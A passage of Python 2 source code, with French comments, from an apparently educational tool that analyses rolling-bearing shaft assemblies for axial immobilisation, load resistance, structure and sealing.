## print "Activation bouton",self.img,state
## if state == 'normal':
## self.master.etatBoutons[self.img] = self.etatDefaut
## else:
## self.master.etatBoutons[self.img] = state
##
## self.etat = self.master.etatBoutons[self.img]
## self.changerBulle()
##
##
## ############################################################################
## def afficheImage(self, remonter = False):
## self.remonter = remonter
## if remonter:
## tagImg = self.img+self.rad+"R"
## else:
## tagImg = self.img+self.rad
## self.image = ImageTk.PhotoImage(Images.BoutonMont[tagImg])
## self['image'] = self.image
## self.changerBulle()
##
##
## ############################################################################
## def changerEtatDefaut(self, etatDefaut):
## self['state'] = etatDefaut
## self.etatDefaut = etatDefaut
## self.etat = self['state']
## if etatDefaut == 'disabled':
## self['cursor'] = "question_arrow"
## self.faireUneCroix()
## else:
## self['cursor'] = "arrow"
##
##
## ############################################################################
## def changerBulle(self):
##
## if self.typeBulle <> 'mont':
## return
## if self.etat == 'disabled':
## return
#### print "changer bulle :",self.typeBulle
#### if self.typeBulle == 'normal':
###### print " ",self.clefBulle
#### self.bulle.__init__(self,clefMess = self.clefBulle)
## if self.typeBulle == 'mont':
#### print " .."
## self.bulle = InfoBulle(self, Const.InfoBulleMulti,
## lstClefBulle = self.listeBulle(), temps = 0)
##
##
##
##
## ############################################################################
## def listeBulle(self):
## b = []
## if self.typeBulle == 'mont':
## if self.etatDefaut == "normal" and self.img[4] == "R" \
## and self.master.master.analyse.elemDemonte == []:
## b.append('EnsPasDemont')
## else:
## b.append('vide')
## if self.remonter:
## b.append("Rem")
## else:
## b.append("Dem")
## b.append(self.img[4:7])
## if self.img[4] == "R":
## b.append(self.img[7])
## else:
## b.append(self.rad)
## if self.remonter:
## b.append("depuis")
## else:
## b.append("vers")
## b.append("sens"+self.img[8])
##
##
## return b
#####################################################################################################
##
#####################################################################################################
##class FrameDetails(Toplevel):
## def __init__(self, master = None, lstObstacles = None, sens = None, palier = None):
## Toplevel.__init__(self, master, bd = 2, bg = 'lightyellow', relief = RIDGE)
#### print "Détails pour palier",palier,"obs =",lstObstacles,"sens ",sens
## self.parent = master
## self.withdraw()
## self.overrideredirect(1)
## self.transient()
##
## self.tipwidth = 0
## self.tipheight = 0
##
## self.lstObstacles = lstObstacles
## self.sens = sens
## self.palier = palier
##
#### print lstObstacles
## if type(lstObstacles) == ListType:
## if type(lstObstacles[0]) is StringType:
## self.label = 'simple'
## message = Const.MessageAnalyse('CollisionRlt')
## else:
## self.label = 'double'
## message = Const.MessageAnalyse('Collision')
## else:
## self.label = 'bague'
## if len(lstObstacles.keys()) == 1:
## message = Const.MessageAnalyse('BagueIsolee')
## else:
## message = Const.MessageAnalyse('BaguesIsolees')
##
#### print "double = ",self.double
##
## Label(self, text = message.mess,
## font = Const.Font_MessBulleS[0],
## fg = Const.Font_MessBulleS[1],
## bg = 'lightyellow',
## anchor = W, justify = LEFT) \
## .grid(row = 0, column = 0, sticky = W)
##
##
## pos = Montage.PositionDansPivot()
## r = 1
## self.lab = {}
## for i in lstObstacles:
## strObstacles = ''
## if self.label == 'double':
## strObstacles += " - " + pos.traduireEnTexte(i[0]) + "\n\tet " + pos.traduireEnTexte(i[1])
## elif self.label == 'simple':
## strObstacles += " - " + pos.traduireEnTexte(i)
## elif self.label == 'bague':
## strObstacles += " - " + Const.cote2text[i]
##
## if self.label == 'bague':
## nn = i
## else:
## nn = r-1
##
## self.lab[nn] = Label(self, text = strObstacles,
## font = Const.Font_MessBulle[0],
## fg = Const.Font_MessBulle[1],
## bg = 'lightyellow',
## anchor = W, justify = LEFT)
##
## self.lab[nn].grid(row = r, column = 0, sticky = W)
## r +=1
##
## self.lab[nn].bind('<Enter>',lambda evt = None, num = nn, act = True : \
## self.montrerCacherElem(evt,num,act))
## self.lab[nn].bind('<Leave>',lambda evt = None, num = nn, act = False : \
## self.montrerCacherElem(evt,num,act))
##
##
## self.bind('<Button-1>',self.efface,"+")
#### self.bind('<Leave>',self.efface,"+")
## self.bind_all("<Escape>", self.efface, "+")
## self.parent.bind('<Leave>',self.delai,"+")
## self.bind('<Enter>',self.affiche,"+")
## self.parent.bind('<Enter>',self.affiche,"+")
## self.parent.master.bind('<Enter>',self.delai,"+")
## self.parent.master.master.bind('<Enter>',self.delai,"+")
##
##
##
## ##########################################################################################
## def montrerCacherElem(self, event, num, act):
##
## if act:
## coul = "blue"
## else:
## coul = "black"
## self.lab[num].config(fg = coul)
##
## deuxCoul = True
## if self.label == 'double':
## lstElem = self.lstObstacles[num]
## elif self.label == 'simple':
## lstElem = [self.lstObstacles[num]]
## elif self.label == 'bague':
## deuxCoul = False
## lstElem = self.lstObstacles[num]
##
## self.parent.master.master.analyse.montrerArrets(lstCode = lstElem, sens = self.sens,
## palier = self.palier, active = act,
## deuxCouleurs = deuxCoul)
##
## ####################################################################################################
## def delai(self,event = None):
## self.action = self.parent.after(200,self.efface)
##
## ####################################################################################################
## def affiche(self, event = None):
## self.update_idletasks()
##
## posX = self.parent.winfo_rootx()+self.parent.winfo_width()/2
## posY = self.parent.winfo_rooty()+self.parent.winfo_height()
## if posX + self.tipwidth > self.winfo_screenwidth():
## posX = posX-self.winfo_width()-self.tipwidth/2
## if posY + self.tipheight > self.winfo_screenheight():
## posY = posY-self.winfo_height()-self.tipheight
#### else:
#### posX = self.parent.winfo_rootx()
#### posY = self.parent.winfo_rooty()
##
## self.geometry('+%d+%d'%(posX,posY))
## self.deiconify()
## self.parent.after_cancel(self.action)
##
## ####################################################################################################
## def efface(self,event = None):
## self.withdraw()
#### self.parent.after_cancel(self.action)
##
##############################################################################
##############################################################################
#
# Chaines d'Action dans le sens <sens> #
#
##############################################################################
##############################################################################
class ChainesAction:
def __init__(self, sens):
## self.chaine = ChaineActionSens(sens)
## self.result = []
self.sens = sens
# liste des numéros des parcours valides
self.valid = []
# Liste des parcours
self.parcoursElemEntr = [[]]
# Une liste de lignes par sens ...
self.lstLignes = []
#############################################################################
def determiner(self, mtg, zoneMtg, serrage = False):
## print "---------------------"
## print
self.__init__(self.sens)
## # On teste s'il y a 2 roulements :
## #---------------------------------
## if mtg.deuxrlt == 0:
## mtg.resultatRemarques.append(Const.MessageAnalyse('ManqueRlt'))
## return
## print "Sens = ",self.sens
if self.sens == 0:
cote = "G"
coteOpp = "D"
else:
cote = "D"
coteOpp = "G"
# print ">>> Sens " ,self.sens
# print mtg
# Analyse depuis l'extrémité du montage :
#----------------------------------------
pos = Montage.PositionDansPivot(typelem = "A",
radiale = "Ar",
cotelem = cote,
palier = cote)
self.maillonElemEntraines(mtg,pos,0)
# Analyse depuis le milieu du montage :
#--------------------------------------
pos = Montage.PositionDansPivot(typelem = "A",
radiale = "Ar",
cotelem = cote,
palier = coteOpp)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
# Analyse depuis le roulement extrémité :
#----------------------------------------
if serrage:
pos = Montage.PositionDansPivot(typelem = "R",
radiale = "Ar",
cotelem = cote,
palier = cote)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
# Analyse depuis le roulement milieu :
#-------------------------------------
if serrage:
pos = Montage.PositionDansPivot(typelem = "R",
radiale = "Ar",
cotelem = cote,
palier = coteOpp)
self.parcoursElemEntr.append([])
self.maillonElemEntraines(mtg,pos,len(self.parcoursElemEntr)-1)
# Analyse des parcours :
#-----------------------
for i in range(len(self.parcoursElemEntr)):
par = self.parcoursElemEntr[i]
if len(par) > 0:
pos = par[len(par)-1]
## print mtg.elemPos(pos)
if pos.radiale == "Al" \
and mtg.elemPos(pos).supporteEffortAxial(self.sens,pos) \
and pos.typelem == "A":
self.valid.append(i)
# Détermination des lignes :
#---------------------------
self.determinerLignes(mtg, zoneMtg, self.sens)
# print "Parcours :\n",self.parcoursElemEntr
# print "Valides :\n",self.valid
# ###########################################################################
# def __repr__(self, num = 0):
## print '< Parcours sens',self.sens,': '+str(num)+' >'
# return self.parcoursElemEntr[num]
##########################################################################
def ajouterMaillonElemEntre(self, pos, num):
lp = Montage.PositionDansPivot()
lp = pos.copie()
## print " > Ajout",num,pos
self.parcoursElemEntr[num].append(lp)
## print "-- Ajout",lp
##########################################################################
def nouveauParcours(self, num, dernPos = None):
"Crée un nouveau parcours à partir du parcour <num> et retourne son numéro"
# On crée le nouveau parcours ...
self.parcoursElemEntr.append([])
numSuiv = len(self.parcoursElemEntr)-1
## print "dernpos",dernPos
# On copie le parcours dans le parcours suivant ...
for p in self.parcoursElemEntr[num]:
## print "copie",p
self.ajouterMaillonElemEntre(p, numSuiv)
if p.egal(dernPos):
## print "fin"
return numSuiv
return numSuiv
#########################################################################
def maillonElemEntraines(self,mtg,pos,num):
""" Renvoie un maillon "actif" d'une chaine d'action
"""
## if len(self.parcoursElemEntr)<num+1:
## self.parcoursElemEntr.append([])
## print
# print "**** sens",self.sens,"*************"
# print ">> Num",num
# print ">> Position",pos
# print ">> Eléments",self.parcoursElemEntr[num]
if pos == None:
return False
else:
maillon = mtg.elemPos(pos)
maillonOpp = mtg.elemPos(pos.opposee())
# Sortie si premier maillon est entretoise
if ( maillon.estEntretoise() \
or (maillon.num is None and maillonOpp.estEntretoise())) \
and len(self.parcoursElemEntr[num]) == 0:
# print "prem maillon = entretoise"
return False
### si l'élément est une entretoise
if maillon.estEntretoise() or maillonOpp.estEntretoise():
# print " > Entretoise"
# Ajout de l'entretoise et séparation éventuelle des parcours
if not maillon.estEntretoise() and pos.radiale == "Al":
# Si double contact entretoise / épaulement
# print " > Nouveau parcours : cas 3 = double contact entretoise/épaulement"
numSuiv = self.nouveauParcours(num)
self.ajouterMaillonElemEntre(pos.opposee(),numSuiv)
else:
numSuiv = num
self.ajouterMaillonElemEntre(pos,numSuiv)
# Ajout du roulement suivant si entretoise sur alésage
if pos.radiale == "Al":
# print " > Ajout rlt",pos.suivant("RoultSuiv",self.sens).code()
self.ajouterMaillonElemEntre(pos.suivant("RoultSuiv",self.sens),numSuiv)
# On continue par l'entretoise ...
if not self.maillonElemEntraines(mtg,pos.suivant("SauteEntre",self.sens),numSuiv):
# print " > num",numSuiv," Echec après entretoise !"
if num == numSuiv:
return False
if num == numSuiv:
return True
### si l'élément supporte
# ss = maillon.supporteEffortAxial(self.sens,pos)
# print ss
if (maillon.num is not None) and maillon.supporteEffortAxial(self.sens,pos):
## print " > num",num," Supporte"
# On ajoute l'élément ...
self.ajouterMaillonElemEntre(pos,num)
## print self.__repr__(num)
if pos.radiale == "Al":
## print " > Fin ..."
return True
else:
# On continue ...
if not self.maillonElemEntraines(mtg,pos.suivant("DansChaine",self.sens),num):
## print " > num",num," Echec dans chaine !"
pass
## return False
# 2ème parcours : cas 1 = traverse bague int rlt
if pos.radiale == "Ar" and pos.typelem == "A":
## print " > num",num," Nouveau parcours cas 1 = traverse bague int rlt"
## print " > reprise à",pos
numSuiv = self.nouveauParcours(num,pos)
# On ajoute le roulement sauté ...
self.ajouterMaillonElemEntre(pos.suivant("RoultSaute",self.sens),numSuiv)
if not self.maillonElemEntraines(mtg,pos.suivant("SauteRoult",self.sens),numSuiv):
## print " > num",numSuiv," Echec après cas 1 !"
return False
### si l'élément NE supporte PAS
else:
## print " > num",num," Supporte pas"
# On ajoute le dernier maillon ...
if maillon.num is not None:
self.ajouterMaillonElemEntre(pos,num)
# 2ème parcours : cas 2 = palier suivant
if (self.sens == 0 and pos.palier == "G") \
and (self.sens == 1 and pos.palier == "D"):
## print " > num",num,"Nouveau parcours : cas 2 = palier suivant"
self.parcoursElemEntr.append([])
numSuiv = len(self.parcoursElemEntr)-1
if not self.maillonElemEntraines(mtg,pos.suivant("SautePalier",self.sens),numSuiv):
## print " > num",numSuiv," Echec après cas 2 !"
return False
## print " > num",num," Echec supporte pas !"
## return False
return True
#############################################################################
def determinerLignes(self, mtg, zoneMtg, sens):
""" Rempli une liste de points <self.lstLignes>
pour le tracé des chaines d'action.
"""
def ajouterPoints(x , y, ligne, sgnSens, ecartement = 5):
"""Ajoute 2 points autour de la position <x,y> """
ligne.append(wx.Point(x - sgnSens*ecartement,
zoneMtg.milieuY + y + sgnSens))
ligne.append(wx.Point(x + sgnSens*ecartement,
zoneMtg.milieuY + y + sgnSens))
sgnsens = -sens * 2 + 1
# Une ligne en haut ...
lignes = []
## print
## print "Chaine d'action : sens =",sens
# Préparation des parcours :
#--------------------------
lstParcours = []
for nParcours in self.valid:
# Nouveau parcours
parcours = []
lstParcours.append(parcours)
# print "Parcours ",nParcours,":",self.parcoursElemEntr[nParcours]
for i in range(len(self.parcoursElemEntr[nParcours])):
posParcours = self.parcoursElemEntr[nParcours][i]
# Cas des arrets ...
if posParcours.typelem == "A" :
elemEntret = mtg.elemPos(posParcours).estEntretoise()
elemOppEntret = mtg.elemPos(posParcours.opposee()).estEntretoise()
# Cas des entretoises
if elemEntret or elemOppEntret: # il y a une entretoise ...
# print " .. entretoise ..",
if elemEntret: # and (elemOppEntret \
# or (posParcours.palier == "G" and sens == 0 \
# or posParcours.palier == "D" and sens == 1)): # elle sert ...
# print " .. qui sert. .."
pos = posParcours.copie()
pos.palier = None
pos.cotelem = None
parcours.append(pos)
else: # elle ne sert pas ...
# print
parcours.append(posParcours)
else: # il n'y a pas d'entretoise ...
parcours.append(posParcours)
# Cas des roulements
elif posParcours.typelem == "R":
# On l'ajoute s'il est "traversé" radialement ...
if (self.parcoursElemEntr[nParcours][i-1].radiale \
<> self.parcoursElemEntr[nParcours][i+1].radiale):
parcours.append(posParcours)
# print " Parcours modifié :",parcours
# Fabrication des lignes :
#-------------------------
lstLignes = []
for parcours in lstParcours:
# Nouvelle ligne
ligne = []
lstLignes.append(ligne)
# Points de départ
ajouterPoints(zoneMtg.milieuX - sgnsens * (zoneMtg.milieuX - 40) ,
0 ,
ligne, sgnsens, ecartement = 20)
# Bords des elements #############################
for posParcours in parcours:
# Alignement en Y en face du premier bord
if len(ligne) == 2:
x , y = zoneMtg.coordsBordElem(mtg, posParcours)
ajouterPoints(x - sgnsens*40, 0, ligne, sgnsens,
ecartement = 20)
# Cas des entretoises
if posParcours.palier == None:
## print " entretoise..."
pos = posParcours.copie()
cotesEntretoise = [{'p' : "G", 'c' : "D"},
{'p' : "D", 'c' : "G"}]
if sens == 1:
cotesEntretoise.reverse()
for d in cotesEntretoise:
pos.palier = d['p']
pos.cotelem = d['c']
x , y = zoneMtg.coordsBordElem(mtg, pos, entretoise = True)
ajouterPoints(x , y , ligne, sgnsens)
else:
x , y = zoneMtg.coordsBordElem(mtg, posParcours)
ajouterPoints(x , y , ligne, sgnsens)
# Points d'arrivée
ajouterPoints(x + sgnsens*40, -200, ligne, sgnsens,
ecartement = 20)
ajouterPoints(zoneMtg.milieuX + sgnsens * (zoneMtg.milieuX - 40) ,
-200,
ligne, sgnsens, ecartement = 20)
self.lstLignes = lstLignes
##############################################################################
##############################################################################
# #
# Analyse #
# #
##############################################################################
##############################################################################
class Analyse:
def __init__(self):
# Options :
# ... ne pas tenir compte des ajustements sérrés des roulements
self.demonterRltSerres = False
# Etat de l'analyse
self.estPerimee = True
# Par défaut : pas de roulements
self.montageVide = True
# Liste des tags des éléments démontés
self.elemDemonte = []
# Flag pour annoncer si animation en cours
self.animEnCours = False
self.mobileTrace = None
self.lstItemAles, self.lstItemArbre = [], []
# Chaines d'actions à tracer lors d'un "DessineTout"
self.chaineTracee = {0 : None,
1 : None}
self.obstacleTrace = None
##########################################################################
def lancerAnalyse(self, mtgComplet, zoneMtg):
""" Lance la procédure d'analyse du montage
"""
#
# print "Début analyse ..."
# print mtgComplet.mtg
tm = time.clock()
self.cdcf = mtgComplet.CdCF
self.mtg = mtgComplet.mtg
# Toutes les analyses ...
#-------------------------
# Remarques diverses....
self.analyserRemarques()
# Immobilisation axiale
self.analyserImmobilisationAxiale(zoneMtg)
# Structure ....
self.analyserStructure()
# Résistance aux charges ( dans cet ordre !! )
self.analyserResistanceRlt()
self.analyserResistanceAxialeMtg()
# Montabilité
self.analyserMontabilite(self.demonterRltSerres, zoneMtg)
if self.mtg.palier["G"].rlt.num is not None \
or self.mtg.palier["D"].rlt.num is not None:
self.montageVide = False
else:
self.montageVide = True
# Etanchéité
self.analyserEtancheite()
self.estPerimee = False
# print "Fin analyse", time.clock()- tm
##########################################################################
# Analyse : Structure du montage #
##########################################################################
def analyserStructure(self):
""" Analyser la structure du montage :
--> ddl supprimés
--> Schéma de strucure
"""
def definirddlSupprimes(palier):
""" Détermination des ddl supprimés par le <palier>
0 : aucuns
1 : x+
2 : x-
4 : y
8 : n (rotation /z)
"""
# print "Définition des ddl, palier",palier
d = 0
if self.mtg.palier[palier].rlt.num == None:
return d
for sens in [0,1]:
for parcoursvalid in self.chaineAct[sens].valid :
parcours = self.chaineAct[sens].parcoursElemEntr[parcoursvalid]
# print " ", sens, parcours
for n in range(len(parcours)-2):
pos = parcours[1:-1][n]
av = parcours[:-2][n]
ap = parcours[2:][n]
# for [av, pos, ap] in [parcours[:-2], parcours[1:-1], parcours[2:]]:
# print av, pos, ap,
if pos.typelem == "R" and pos.palier == palier and av.radiale <> ap.radiale:
d = d|(2**sens)
# print ddlSupprimes[cote]
if not self.mtg.elemPos(pos).estButee() and not self.mtg.elemPos(pos).estButeeDbl():
# print palier,"pas butée_"
d = d|4
if not self.mtg.palier[palier].rlt.estButee() and not self.mtg.palier[palier].rlt.estButeeDbl():
# print cote,"pas butée"
d = d|4
if self.mtg.palier[palier].rlt.num == 10 or self.mtg.palier[palier].rlt.num == 11:
# print cote,"pas butée"
d = d|8
# print " ddl suppr :",d
return d
self.ddlSupprimes = {}
for i in ["G","D"]:
self.ddlSupprimes[i] = definirddlSupprimes(i)
self.schemaStructure = SchemaStructure()
self.schemaStructure.determiner(self.mtg, self.ddlSupprimes)
# Image du Schéma de Structure
#------------------------------
self.imageSchema = self.schemaStructure.bitmap()
##########################################################################
# Analyse : Remarques générales #
##########################################################################
def analyserRemarques(self):
""" Analyser si les regles de montage axial des roulements est respectée
"""
# Résultats
self.resultatRemarques = []
# Teste s'il y a deux roulements ###############################################
if self.mtg.deuxrlt() == 0:
self.resultatRemarques.append(Const.MessageAnalyse('ManqueRlt'))
return
# Teste si les deux roulements sont compatibles ##############################
if self.mtg.palier["G"].rlt.estOblique() or self.mtg.palier["D"].rlt.estOblique():
if (not self.mtg.palier["D"].rlt.estOblique()) or (not self.mtg.palier["G"].rlt.estOblique()):
self.resultatRemarques.append(Const.MessageAnalyse('RltsImcomp'))
else:
if self.mtg.palier["G"].rlt.orientation == self.mtg.palier["D"].rlt.orientation:
self.resultatRemarques.append(Const.MessageAnalyse('OrientIncorr'))
# Teste si les roulements à bague séparable sont maintenus #####################
clefResultRem = ""
for i in ["G","D"]:
if self.mtg.palier[i].rlt.estSeparable() \
and not self.mtg.palier[i].rlt.estOblique():
if not self.mtg.palier[i].arr['Ar']['G'].estDefini() \
or not self.mtg.palier[i].arr['Ar']['D'].estDefini() \
or not self.mtg.palier[i].arr['Al']['G'].estDefini() \
or not self.mtg.palier[i].arr['Al']['D'].estDefini():
clefResultRem += i
if clefResultRem <> "":
self.resultatRemarques.append(Const.MessageAnalyse('RltPasMaintenu',[clefResultRem]))
# Teste si les roulements sont arrétés sur la bague "tournante" ################
clefResultRem = ""
for i in ["G","D"]:
if self.cdcf.bagueTournante == "I":
codBag = "Ar"
if not self.mtg.palier[i].rlt.estOblique() \
and (not self.mtg.palier[i].arr['Ar']['G'].estDefini() \
or not self.mtg.palier[i].arr['Ar']['D'].estDefini()):
clefResultRem += i
else:
codBag = "Al"
if not self.mtg.palier[i].rlt.estOblique() \
and (not self.mtg.palier[i].arr['Al']['G'].estDefini() \
or not self.mtg.palier[i].arr['Al']['D'].estDefini()):
clefResultRem += i
if clefResultRem <> "":
self.resultatRemarques.append(Const.MessageAnalyse('RltPasArrete', (clefResultRem, codBag)))
##########################################################################
# Analyse : immobilisation axiale du montage #
##########################################################################
def analyserImmobilisationAxiale(self, zoneMtg):
""" Analyse de l'immobilisation axiale du montage
==> résultats dans des chaines d'action
"""
# Immobilisation axiale du montage ...
#-------------------------------------
# --> resultats : un par sens ...
self.resultatImmobilisation = [[],[]]
# --> chaines d'action : une par sens ...
self.chaineAct = [ChainesAction(0), \
ChainesAction(1)]
# --> Liste des éléments qui ne sont par arrétée : une par sens ...
self.listeElementsNonArretes = [[],[]]
# --> Image du Schéma de structure
self.imageSchema = None
# --> Message principal
self.messageImmobilisation = None
# print self.chaineAct[0]
def listeElementsNonArretes(sens):
""" Renvoie la liste des éléments non arrêtés dans le sens <sens>
"""
lst = []
if sens == 0:
sensstr = "D"
else:
sensstr = "G"
# S'il existe un parcours valide ... on sort
if len(self.chaineAct[sens].valid) > 0:
return lst
# On passe par tous les parcousrs
for i in range(len(self.chaineAct[sens].parcoursElemEntr)):
# print " Parcours",i,":",self.chaineAct[sens].parcoursElemEntr[i]
# Parcours du parcours i
for po in self.chaineAct[sens].parcoursElemEntr[i]:
# Cas des roulements
if po.typelem == "R":
radialePreced = lst[len(lst)-1][3:]
# On ajoute les 2 bagues du roulement poussé
# print po, radialePreced, self.mtg.elemPos(po).supporteEffortAxial(sens)
if (radialePreced == "Ar" \
and self.mtg.elemPos(po).supporteEffortAxial(sens)) \
or (radialePreced == "Al" \
and self.mtg.elemPos(po).supporteEffortAxial(not sens)) \
or (self.mtg.elemPos(po).supporteEffortAxial(not sens) \
and self.mtg.elemPos(po).supporteEffortAxial(sens)):
lst.append(po.code()[0:3]+'--')
# print po.code()[0:3]+'--'
# On ajoute la bague du roulement poussée
else:
po.palier = lst[len(lst)-1][1]
lst.append(po.code(radialePreced))
## if radialePreced == "Ar":
## lst.append("BI" + lst[len(lst)-1][1] + sensstr)
## else:
## lst.append("BE" + lst[len(lst)-1][1] + sensstr)
# Cas des arrets
else:
lst.append(po.code())
# Cas des entretoises
if self.mtg.elemPos(po).estEntretoise():
## print "Entretoise"
lst.append(po.opposee().code())
# On ajoute les arrets fixés à l'arbre
for p in [Montage.PositionDansPivot("G","A","G","Ar"),
Montage.PositionDansPivot("G","A","D","Ar"),
Montage.PositionDansPivot("D","A","G","Ar"),
Montage.PositionDansPivot("D","A","D","Ar")]:
## print self.elemPos(p).codeTag(p)
el = self.mtg.elemPos(p)
if el is not None \
and el.supporteEffortAxial() \
and not el.estEpaulement():
## lst.append(mtg.elemPos(p).codeTag(p))
lst.append(p.code())
# Ajout bague intérieure si entrainée
# if p.cotelem <> sensstr:
# lst.append("BI"+p.palier+sensstr)
# Nettoyage de la liste
lst2 = []
for i in range(len(lst)):
if not lst[i] in lst2:
lst2.append(lst[i])
## print " Liste des éléments non arrétés :",lst2
return lst2
for s in [0,1]:
# Analyse :
self.chaineAct[s].determiner(self.mtg, zoneMtg)
self.listeElementsNonArretes[s] = listeElementsNonArretes(s)
print self.listeElementsNonArretes[s]
# Résultats :
# Arbre pas arrêté !
if len(self.chaineAct[s].valid) == 0:
self.resultatImmobilisation[s].append(Const.MessageAnalyse('ArretArbreSens', [s]))
# Arbre arrêté !
else:
self.resultatImmobilisation[s].append(Const.MessageAnalyse('ImmobCorrect'))
# hyperstatique !
if len(self.chaineAct[s].valid) > 1:
self.resultatImmobilisation[s].append(Const.MessageAnalyse('Hyperstatique'))
# Message Principal
#-------------------
if self.resultatImmobilisation[0][0].clef == 'ImmobCorrect' \
and self.resultatImmobilisation[1][0].clef == 'ImmobCorrect':
self.messageImmobilisation = Const.MessageAnalyse('ArbreArrete')
else:
self.messageImmobilisation = Const.MessageAnalyse('ArbrePasArrete')
##########################################################################
# Analyse : résistance axiale du montage #
##########################################################################
def analyserResistanceAxialeMtg(self):
""" Analyse la résistance axiale du montage complet
"""
#############################################################################
def nomsElem(sens):
lst = []
pos = Montage.PositionDansPivot()
for res in self.lstElemResistePas[sens]:
lst.append(Const.MessageAnalyse(mess = pos.traduireEnTexte(res), coul = "rouge"))
return lst
# Résistance axiale du montage ...
# --> Résultats :
self.resultatEffortAxialMtg = [[],[]]
# --> Eléments ne résistant : par sens ...
self.lstElemResistePas = [[],[]]
# --> Image du Schéma de structure (avec charges)
self.imageSchemaCharges = None
# --> Message principal
self.messageResistanceAxiale = None
lstElemResistePas = [[],[]]
for sens in [0,1]:
## print "sens", sens
chaine = self.chaineAct[sens]
for nParcours in chaine.valid:
## print chaine.parcoursElemEntr[nParcours]
for n in range(len(chaine.parcoursElemEntr[nParcours])):
posParcours = chaine.parcoursElemEntr[nParcours][n]
elem = self.mtg.elemPos(posParcours)
## print n
if (elem.num is not None) and not (posParcours.typelem == "R" and \
chaine.parcoursElemEntr[nParcours][n-1].radiale == chaine.parcoursElemEntr[nParcours][n+1].radiale):
if elem.effortAxialSupporte() < self.cdcf.effortAxial[sens].val:
## print posParcours,self.resultatResistanceRlt[posParcours.palier].clef =='RltSupportePas'
if posParcours.typelem <> "R" \
or self.resultatResistanceRlt[posParcours.palier].clef == 'RltSupportePas':
lstElemResistePas[sens].append(posParcours.code())
# On ote les doublons et on "regroupe" les bagues des roulements
for e in lstElemResistePas[sens]:
if e[0] == "R":
e = e[0:2]+"---"
if not e in self.lstElemResistePas[sens]:
self.lstElemResistePas[sens].append(e)
if lstElemResistePas[sens] <> []:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ElemResistPas'))
self.resultatEffortAxialMtg[sens].extend(nomsElem(sens))
else:
if chaine.valid == []:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ArretArbreSens', [sens]))
else:
self.resultatEffortAxialMtg[sens].append(Const.MessageAnalyse('ChargeAxOk'))
# Message principal
#-------------------
if self.resultatEffortAxialMtg[0][0].clef == 'ChargeAxOk' \
and self.resultatEffortAxialMtg[1][0].clef == 'ChargeAxOk':
self.messageResistanceAxiale = Const.MessageAnalyse('ChargeAxOk')
else:
self.messageResistanceAxiale = Const.MessageAnalyse('ChargeAxNo')
# Image du Schéma de Structure
#------------------------------
def charge(cote):
return [self.typeCharge[cote],
self.typeCharge[cote] == 0 \
or self.resultatResistanceRlt[cote] == None \
or self.resultatResistanceRlt[cote].clef == 'RltSupporte']
charges = {"G" : charge("G"),
"D" : charge("D")}
self.imageSchemaCharges = self.schemaStructure.bitmap(charges)
##########################################################################
# Analyse : résistance aux charges des roulements #
##########################################################################
def analyserResistanceRlt(self):
""" Analyse la résistance aux charges des roulements
* Type de charge subie par un roulement :
0 : aucune
1 : x+
2 : x-
4 : y
*
"""
# Résistance des roulements ...
# --> Résultats : un par palier ...
self.resultatResistanceRlt = {"G" : None,
"D" : None}
# --> Un type de charge par palier ...
self.typeCharge = {"G" : 0,
"D" : 0}
# self.sensChargeAx = {"G" : [],
# "D" : []}
def definirTypeChargeCdCF(palier):
""" Type de charge que doit supporter le <palier> d'après le CdCF
"""
t = 0
# self.sensChargeAx[palier] = []
## print
# print "Definition type de charge CdCF",palier, "-->",
if self.cdcf.effortRadial[palier].get() <> 0:
t += 4
for sens in [0,1]:
# print self.cdcf.effortAxial[sens].get(),"-->",
if self.cdcf.effortAxial[sens].get() <> 0:
t = t|(1+sens)
# print t
return t
# Analyse des roulements ...
for i in ["G","D"]:
# Type de charge suportée par le palier
typeChargeCdCF = definirTypeChargeCdCF(i)
self.typeCharge[i] = (self.ddlSupprimes[i]|4) & typeChargeCdCF
rlt = self.mtg.palier[i].rlt
# Détermination de l'intensité de la charge axiale (s'il y en a une ...)
chargeAxiale = 0
ls = []
if self.typeCharge[i]&1 :
ls.append(0)
if self.typeCharge[i]&2:
ls.append(1)
for sens in ls:
chargeAxiale = max(chargeAxiale, self.cdcf.effortAxial[sens].get())
# Détermination de l'intensité de la charge radiale (s'il y en a une ...)
chargeRadiale = self.cdcf.effortRadial[i].get()
# On teste si le roulement résiste ...
if rlt.num is not None:
if self.typeCharge[i]&4:
typeCharge = "radial"
intensite = chargeRadiale
if self.typeCharge[i]&3:
typeCharge = "axial"
intensite = chargeAxiale
if self.typeCharge[i]&3 and self.typeCharge[i]&4:
typeCharge = "combi"
intensite = max(chargeRadiale,chargeAxiale)
if self.typeCharge[i] == 0:
typeCharge = ""
intensite = 0
# print self.typeCharge[i]
# print "test rlt",i , typeCharge, intensite,
if typeCharge <> "" and rlt.coefTaille(rlt.chargeAdm[typeCharge]) < intensite:
# if (self.typeCharge[i]&4 and (rlt.coefTaille(rlt.chargeAdm["radial"]) < chargeRadiale)) \
# or (self.typeCharge[i]&3 and (rlt.coefTaille(rlt.chargeAdm["axial"]) < chargeAxiale)) \
# or (self.typeCharge[i]&3 and self.typeCharge[i]&4 and (rlt.coefTaille(rlt.chargeAdm["combi"]) < max(chargeRadiale,chargeAxiale))):
self.resultatResistanceRlt[i] = Const.MessageAnalyse('RltSupportePas')
# print "No"
else:
self.resultatResistanceRlt[i] = Const.MessageAnalyse('RltSupporte')
# print "Ok"
# Message principal
supp = []
for p in ["G","D"]:
if self.resultatResistanceRlt[p] is not None \
and self.resultatResistanceRlt[p].clef == 'RltSupportePas':
supp.append(p)
if len(supp) == 2:
self.messageResistanceRlt = Const.MessageAnalyse('TRltSupportePas')
elif len(supp) == 1:
self.messageResistanceRlt = Const.MessageAnalyse('1RltSupportePas', supp[0])
else:
self.messageResistanceRlt = Const.MessageAnalyse('TRltSupporte')
# print "Charges CdCF :", self.typeCharge
##########################################################################
# Analyse : Etancheite #
##########################################################################
def analyserEtancheite(self):
""" Analyse l'étanchéité du montage
"""
# print "Analyse etancheite"
#
# Etanchéité du montage
#
# --> Résultats :
self.resultatEtancheite = {"M" : None,
"G" : {'vitt' : None,
'pres' : None},
"D" : {'vitt' : None,
'pres' : None}}
pasEtanchStat = {"G" : {"Ar" : False, #
"Al" : False}, # Localisation
"D" : {"Ar" : False, # du défaut
"Al" : False}, #
"B" : []} #
pasEtanchDyn = {"G" : {"P" : False,
